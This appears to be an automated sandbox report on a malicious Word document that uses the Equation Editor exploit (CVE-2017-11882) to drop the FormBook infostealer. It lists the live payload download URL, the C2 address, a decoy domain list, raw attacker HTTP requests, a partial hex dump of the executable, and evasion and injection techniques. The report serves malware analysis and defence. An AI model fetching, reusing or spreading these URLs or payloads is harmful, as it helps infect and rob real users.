Windows Analysis Report QUOTATION1100630004R2.doc

Overview

General Information

Sample Name: QUOTATION1100630004R2.doc
Analysis ID: 452514
MD5: a3336f2a85c572aab40243c347ebfe59
SHA1: f6b300530f6d294ea005b13ec08d881c9651f8af
SHA256: 9604fbb0d387877ea857295c8b350e75d5adedc3907bc25f19baf16fff3b0d05
Tags: doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://topv.xyz/princedanx.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}
Multi AV Scanner detection for domain / URL
Source: topv.xyz Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\princedan85671.exe ReversingLabs: Detection: 23%
Multi AV Scanner detection for submitted file
Source: QUOTATION1100630004R2.doc Virustotal: Detection: 33% Perma Link
Source: QUOTATION1100630004R2.doc ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.princedan85671.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\princedan85671.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\princedan85671.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: netsh.pdb source: princedan85671.exe, 00000006.00000002.2223629114.0000000000614000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: princedan85671.exe, netsh.exe

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 4x nop then pop esi 6_2_004172CB
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 4x nop then pop ebx 6_2_00407AFA
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 4x nop then pop edi 6_2_00417D5B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop esi 8_2_000972CB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop ebx 8_2_00087AFB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 8_2_00097D5B
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: topv.xyz
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.containerflippers.com/np0c/
Performs DNS queries to domains with low reputation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE DNS query: topv.xyz
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE DNS query: topv.xyz
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 12:21:11 GMTContent-Type: application/x-msdownloadContent-Length: 648912Last-Modified: Wed, 21 Jul 2021 23:31:35 GMTConnection: keep-aliveETag: "60f8ae57-9e6d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0f 9e f8 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 08 00 00 2c 01 00 00 00 00 00 96 bb 08 00 00 20 00 00 00 c0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c bb 08 00 57 00 00 00 00 c0 08 00 18 28 01 00 00 00 00 00 00 00 00 00 00 ca 09 00 d0 1c 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 9b 08 00 00 20 00 00 00 9c 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 28 01 00 00 c0 08 00 00 2a 01 00 00 9e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 bb 08 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 9f 08 00 a0 1b 00 00 03 00 00 00 20 00 00 06 98 31 00 00 04 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 18 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1a 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 25 00 00 00 00 00 00 00 02 28 15 00 00 0a 02 03 16 2c 0b 26 26 02 04 15 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b f0 7d 03 00 00 04 2b 00 2a 00 00 00 03 30 04 00 5c 00 00 00 00 00 00 00 02 28 15 00 00 0a 20 f0 55 00 00 1c 2d 1b 26 02 73 16 00 00 0a 1d 2d 18 26 26 28 17 00 00 0a 7e 06 00 00 04 25 2d 2f 2b 0e 28 18 00 00 0a 2b df 7d 04 00 00 04 2b e3 26 7e 05 00 00 04 fe 06 0d 00 00 06 73 19 00 00 0a 25 1c 2d 03 26 2b 07 80 06 00 00 04 2b 00 6f 1a 00 00 0a 2a 13 30 03 00 29 00 00 00 01 00 00 11 03 04 73 04 00 00 06 16 2c 0c 26 02 03 28 0a 00 00 06 2d 13 2b 03 0a 2b f2 02 7b 04 00 00 04 06 6f 1b 00 00 0a 17 2a 16 2a 00 00 00 13 30 03 00 24 00 00 00 01 00 00 11 02 03 28 0a 00 00 06 17 2d 06 26 06 2c 14
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /np0c/?TR-l=MbGP/ikgWFw1YX8sov0FXcLkJ99H+22h01XVjNUGdiGHtzvfzcfuzIRPwJA9CGENa/tXtg==&CFQLn=EPt44Fr8fZGdt HTTP/1.1Host: www.anandsharmah.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.239.243.112 185.239.243.112
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View ASN Name: NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /princedanx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: topv.xyzConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{23BE6748-299E-4B99-A605-44EE5B79BCDD}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /princedanx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: topv.xyzConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /np0c/?TR-l=MbGP/ikgWFw1YX8sov0FXcLkJ99H+22h01XVjNUGdiGHtzvfzcfuzIRPwJA9CGENa/tXtg==&CFQLn=EPt44Fr8fZGdt HTTP/1.1Host: www.anandsharmah.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: topv.xyz
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlContent-Length: 583Date: Thu, 22 Jul 2021 12:22:48 GMTServer: LiteSpeedVary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 70 30 63 2f 3f 54 52 2d 6c 3d 4d 62 47 50 2f 69 6b 67 57 46 77 31 59 58 38 73 6f 76 30 46 58 63 4c 6b 4a 39 39 48 2b 32 32 68 30 31 58 56 6a 4e 55 47 64 69 47 48 74 7a 76 66 7a 63 66 75 7a 49 52 50 77 4a 41 39 43 47 45 4e 61 2f 74 58 74 67 3d 3d 26 61 6d 70 3b 43 46 51 4c 6e 3d 45 50 74 34 34 46 72 38 66 5a 47 64 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 61 6e 61 6e 64 73 68 61 72 6d 61 68 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /np0c/?TR-l=MbGP/ikgWFw1YX8sov0FXcLkJ99H+22h01XVjNUGdiGHtzvfzcfuzIRPwJA9CGENa/tXtg==&amp;CFQLn=EPt44Fr8fZGdt was not found on this server.<HR><I>www.anandsharmah.com</I></BODY></HTML>
Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
